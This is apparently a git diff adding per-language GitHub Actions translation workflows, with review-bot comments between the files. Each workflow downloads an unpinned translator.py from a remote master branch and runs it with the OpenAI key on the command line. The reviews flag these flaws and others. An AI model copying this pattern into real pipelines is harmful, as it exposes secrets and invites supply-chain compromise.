@@ -0,0 +1,81 @@ +name: Translator to DE (German) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: de + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: German + BRANCH: de + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || true + 
git push --set-upstream origin "$BRANCH" diff --git a/.github/workflows/translate_es.yml b/.github/workflows/translate_es.yml new file mode 100644 index 0000000000..9c34959a46 --- /dev/null +++ b/.github/workflows/translate_es.yml 
@@ -0,0 +1,81 @@ +name: Translator to ES (Spanish) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: es + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: Spanish + BRANCH: es + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || true + 
git push --set-upstream origin "$BRANCH" diff --git a/.github/workflows/translate_fr.yml b/.github/workflows/translate_fr.yml new file mode 100644 index 0000000000..52eac6c34a --- /dev/null +++ b/.github/workflows/translate_fr.yml 
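Review bot: the OpenAI key is exposed more widely than it needs to be in the "Run translation script on changed files" step: `export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}` splices the secret into the shell script text through expression interpolation (unquoted, so a value containing shell metacharacters also breaks the step), and `--api-key "$OPENAI_API_KEY"` then hands it to translator.py as a command-line argument, where any other process on the runner can read it from `/proc/<pid>/cmdline` (log masking does not cover that), including anything pulled in by the unversioned `pip3 install openai tqdm tiktoken` two steps earlier. Map the secret through the step's `env:` block and have the script read `OPENAI_API_KEY` from the environment. Same hunk, further points: `git diff --name-only HEAD~1` only inspects the last commit, so a push of several commits silently skips the earlier ones; diff against `${{ github.event.before }}` instead, with a fallback for `workflow_dispatch`, where that value is empty. Deleted `.md` paths also appear in that output and are fed to the translator, and when no `.md` file changed `/tmp/file_paths.txt` is never created, so `$(cat /tmp/file_paths.txt)` fails without tripping `-e` (a failing command substitution does not affect the status of the `python` command) and the script runs with `-f ""`; add `[ -s /tmp/file_paths.txt ] || exit 0` before the `python` line. On the supply-chain side, `actions/checkout@v2` and `actions/setup-python@v2` are mutable tags of an old major, the pip packages are unpinned, and the `wget` of translator.py from `raw.githubusercontent.com/.../master` deletes the copy the checkout step already provides and replaces it with an unpinned download at run time; pin the actions to commit SHAs, pin the packages, and use the checked-out `scripts/translator.py` (the job already has master at `fetch-depth: 0`). Finally, the job pushes to the `es` branch but declares no `permissions:` block, so it depends on the repository-wide default token scope; add `permissions: contents: write` at job level, and note that `git commit ... || true` also swallows real commit failures, not only the empty-diff case.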
@@ -0,0 +1,81 @@ +name: Translator to FR (French) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: fr + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: French + BRANCH: fr + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || true + 
git push --set-upstream origin "$BRANCH" diff --git a/.github/workflows/translate_gr.yml b/.github/workflows/translate_gr.yml new file mode 100644 index 0000000000..21f18d2714 --- /dev/null +++ b/.github/workflows/translate_gr.yml 
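Review bot: this file is identical to translate_es.yml apart from `name`, `concurrency`, `LANGUAGE` and `BRANCH`, and the same holds for the eleven other translate_*.yml files added in this change; every fix to secret handling, action pinning or the `HEAD~1` diff range will have to be applied thirteen times and the copies will drift. Collapse them into one workflow with a `strategy.matrix` over `{language, branch}` pairs (keeping one concurrency group per branch with a job-level `concurrency: ${{ matrix.branch }}`), or into a reusable workflow invoked through `workflow_call` with the language and branch as inputs, and delete the per-language copies.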
@@ -0,0 +1,81 @@ +name: Translator to GR (Greek) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: gr + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: Greek + BRANCH: gr + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || true + git 
push --set-upstream origin "$BRANCH" \ No newline at end of file diff --git a/.github/workflows/translate_in.yml b/.github/workflows/translate_in.yml new file mode 100644 index 0000000000..9862987709 --- /dev/null +++ b/.github/workflows/translate_in.yml 
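Review bot: `gr` is the ISO 3166 country code for Greece, not a language code; Greek is `el` under ISO 639-1, and since this value names the published language branch, the concurrency group and the `--branch` argument passed to translator.py, it should be the language code. The same mismatch appears in the sibling files: `in` for Hindi (should be `hi`), `jp` for Japanese (`ja`), `kr` for Korean (`ko`), `rs` for Serbian (`sr`) and `ua` for Ukrainian (`uk`). translate_ua.yml additionally misspells the language as "Ukranian" in both `name` and `LANGUAGE`, and the latter is the literal string passed to translator.py as `--language`. A minor consistency point across the set: some of these files end with "\ No newline at end of file" and others do not.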
@@ -0,0 +1,81 @@ +name: Translator to IN (Hindi) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: in + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: Hindi + BRANCH: in + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || true + git 
push --set-upstream origin "$BRANCH" diff --git a/.github/workflows/translate_it.yml b/.github/workflows/translate_it.yml new file mode 100644 index 0000000000..7112058095 --- /dev/null +++ b/.github/workflows/translate_it.yml 
@@ -0,0 +1,81 @@ +name: Translator to IT (Italian) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: it + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: Italian + BRANCH: it + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || true + 
git push --set-upstream origin "$BRANCH" \ No newline at end of file diff --git a/.github/workflows/translate_jp.yml b/.github/workflows/translate_jp.yml new file mode 100644 index 0000000000..bf22ed9e27 --- /dev/null +++ b/.github/workflows/translate_jp.yml 
@@ -0,0 +1,81 @@ +name: Translator to JP (Japanese) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: jp + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: Japanese + BRANCH: jp + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || true 
+ git push --set-upstream origin "$BRANCH" diff --git a/.github/workflows/translate_kr.yml b/.github/workflows/translate_kr.yml new file mode 100644 index 0000000000..d5b8514081 --- /dev/null +++ b/.github/workflows/translate_kr.yml 
@@ -0,0 +1,81 @@ +name: Translator to KR (Korean) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: kr + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: Korean + BRANCH: kr + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || true + 
git push --set-upstream origin "$BRANCH" \ No newline at end of file diff --git a/.github/workflows/translate_pl.yml b/.github/workflows/translate_pl.yml new file mode 100644 index 0000000000..124cc6dccb --- /dev/null +++ b/.github/workflows/translate_pl.yml 
@@ -0,0 +1,81 @@ +name: Translator to PL (Polish) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: pl + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: Polish + BRANCH: pl + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || true + 
git push --set-upstream origin "$BRANCH" \ No newline at end of file diff --git a/.github/workflows/translate_pt.yml b/.github/workflows/translate_pt.yml new file mode 100644 index 0000000000..831cf311a2 --- /dev/null +++ b/.github/workflows/translate_pt.yml 
@@ -0,0 +1,81 @@ +name: Translator to PT (Portuguese) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: pt + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: Portuguese + BRANCH: pt + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || 
true + git push --set-upstream origin "$BRANCH" diff --git a/.github/workflows/translate_rs.yml b/.github/workflows/translate_rs.yml new file mode 100644 index 0000000000..067b5d47fa --- /dev/null +++ b/.github/workflows/translate_rs.yml 
@@ -0,0 +1,81 @@ +name: Translator to RS (Serbian) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: rs + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: Serbian + BRANCH: rs + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || true + 
git push --set-upstream origin "$BRANCH" \ No newline at end of file diff --git a/.github/workflows/translate_sw.yml b/.github/workflows/translate_sw.yml new file mode 100644 index 0000000000..b3deb4c286 --- /dev/null +++ b/.github/workflows/translate_sw.yml 
@@ -0,0 +1,81 @@ +name: Translator to SW (Swahili) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: sw + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: Swahili + BRANCH: sw + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || true + 
git push --set-upstream origin "$BRANCH" \ No newline at end of file diff --git a/.github/workflows/translate_tr.yml b/.github/workflows/translate_tr.yml new file mode 100644 index 0000000000..0097cd1c3b --- /dev/null +++ b/.github/workflows/translate_tr.yml 
@@ -0,0 +1,81 @@ +name: Translator to TR (Turkish) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: tr + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: Turkish + BRANCH: tr + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || true + 
git push --set-upstream origin "$BRANCH" \ No newline at end of file diff --git a/.github/workflows/translate_ua.yml b/.github/workflows/translate_ua.yml new file mode 100644 index 0000000000..3e154f45f8 --- /dev/null +++ b/.github/workflows/translate_ua.yml 
@@ -0,0 +1,81 @@ +name: Translator to UA (Ukranian) + +on: + push: + branches: + - master + paths-ignore: + - 'scripts/**' + - '.gitignore' + - '.github/**' + workflow_dispatch: + +concurrency: ua + +jobs: + run-translation: + runs-on: ubuntu-latest + environment: prod + env: + LANGUAGE: Ukranian + BRANCH: ua + + steps: + - name: Checkout code + uses: actions/checkout@v2 + with: + fetch-depth: 0 #Needed to download everything to be able to access the master & language branches + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: 3.8 + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip3 install openai tqdm tiktoken + + - name: Update & install wget & translator.py + run: | + sudo apt-get update + sudo apt-get install wget -y + cd scripts + rm -f translator.py + wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py + cd .. + + - name: Download language branch #Make sure we have last version + run: | + git config --global user.name 'Translator' + git config --global user.email 'github-actions@github.com' + git checkout "$BRANCH" + git pull + git checkout master + + - name: Run translation script on changed files + run: | + echo "Starting translations" + echo "Commit: $GITHUB_SHA" + + # Export the OpenAI API key as an environment variable + export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} + + # Run the translation script on each changed file + git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do + if echo "$file" | grep -qE '\.md$'; then + echo -n "$file , " >> /tmp/file_paths.txt + else + echo "Skipping $file" + fi + done + + echo "Translating $(cat /tmp/file_paths.txt)" + python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 + + - name: Commit and push changes + run: | + git checkout "$BRANCH" + git add -A + git commit -m "Translated $BRANCH files" || true 
